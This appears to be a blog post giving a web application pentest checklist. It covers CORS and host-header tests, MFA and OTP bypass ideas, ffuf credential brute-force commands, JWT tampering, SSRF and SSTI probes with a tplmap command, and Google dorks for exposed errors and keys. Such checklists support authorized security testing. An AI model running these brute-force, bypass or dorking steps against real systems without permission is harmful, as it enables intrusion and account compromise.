- Fuzz the Application
- Use testssl.sh to look for SSL issues and Vulnerabilities
- Run Nikto & Nuclei, Dirsearch.py, BlackWidow on the target
- Check if the appliation using AngularJS
- Look for the version and its vulnerabilities
- Check for Content Security Policy
- Check for Cross Origin Resource Sharing
- Change the Origin header domain and see if its reflected on the response or not
- Origin: somerandomdomain.com
- Add Multiple Origin Headers and see the response
- Add Port, Special chars, null strings to it and observe the changes
- Look for Host Header Injection Attacks
- Add extra host header
- Add X-Forwarded-For: somerandomdomain.com header and see if its being reflected or not
- Look for Cached responses (Filter tfor the keyword "Cache" in Burp HTTP history), Web Cache Poisoning might be possible possible
- Check if httonly and Secure flags are added in the cookie or not & HSTS
- Check if .git exists and see if you can use https://github.com/arthaud/git-dumper
- Brute force credentials using burp or ffuf (Add the keyword "FUZZ" where ever you want to fuzz). you can add 1 or more fuzz parameters
- ffuf -request req.txt -request-proto http wordlist.txt
- ffuf -request req.txt -request-proto http -mode clusterbomb -w user.txt:FUZZUSER -w pass.txt:FUZZPASS
- if MFA is enabled try to bypass it
- by removing the otp parameter
- by removing the function
- Check OTP timeout
- check duplicate OTP access
- brute forcing otp
- OTP Attempts
- Check if one MFA code can be used to another account
- If there is any payment involved --> Try to perform Race conditions
- Login as Admin and LowPriv user and check BAC & IDOR using ZAP/Burp
- on Burp Filter by Input Parameter status
- try to send all special characters as input and observe the response
- if a page saves input, try XXS
- SQL injection is possible all on parameters & headers - even Cookie, Referer
- If there are any passwords or credit cards in displayed as aestrix("*")
- look the responses in developer tools
- Look at Client data - Json files for plain text data
- Check for JWT tokens
- decode the JWT and Change the Alg to null
- Change the content in the JWT token and see if it's being validated properly or not
- Use Burp JSON Web Tokens Extension
- use https://github.com/aress31/jwtcat to see if they are using a weak key
- Check Session Vulnerabilities
- Take the sessionID of the user and logout --> return using the same sessionID
- Check Password Reset Link --> req email and go to the link --> see if there are any external urls being used inside the webpage --> check the referer of the domain --> see if the Password reset token is available in the Referrer header.
- Check Parameter Pollution --> Add same parameters twice with different varaiable/ID
- `AutoComplete=off` --> Credit card Processing/Password --> Check if the browser cached the card info or not after updaing the info on the website. It should not store the Card info
- Inspect the form and see if AutoComplete=off is added in the form or not.
- Go to Developer Tools --> Application --> storage --> Session Storage --> try updating the values and observe the difference.
- Look for any available docs on the website and extract metadata using exiftool -a file.doc
- Check if the application parses or uses urls
- Try to update the url in the parameter
- try http://127.0.0.1 to make it into SSRF
- Buffer Overflow the parameter
- check if it gives any useful error messages
- On Password update or payment pages - check if CSRF is possible
- check for SSTO using TPLMAP
- Look for obfuscated JS - decode it using de4js | JavaScript Deobfuscator and Unpacker
python tplmap.py -u 'http://www.target.com/page?name=John'
- Check Google Dorks
- site:hackingdream.net AND intitle:"index of"
- site:hackingdream.net AND ("mysql error with query" OR "mysqli_query" OR "mysqli_query" OR "pdo_mysql")
- site:hackingdream.net AND ("[MICROSOFT]["ODBC SQL" OR "[SQL SERVER]")
- site:hackingdream.net AND ("PostgreSQL server: FATAL" OR "not a valid PostgreSQL result")
- site:hackingdream.net AND ("ORA-00933" OR "ORA-00921" OR "ORA-00936" OR "ORA-12541" OR "[ODBC SQL]")
More dorks here https://www.boxpiper.com/posts/google-dork-list-error-messages
- site:hackingdream.net AND (ext:"backup" OR ext:"bak" OR ext:"old")
- site:hackingdream.net AND intitle:"500"
- site:hackingdream.net AND (inurl:"api" OR inurl:"key" OR inurl:"apikey")
- site:hackingdream.net AND -inurl:"https"
- Books
Book of Tips
Zseano's Methodology
Bug Bounty Playbook
Bug Bounty Playbook 2
Comments
Post a Comment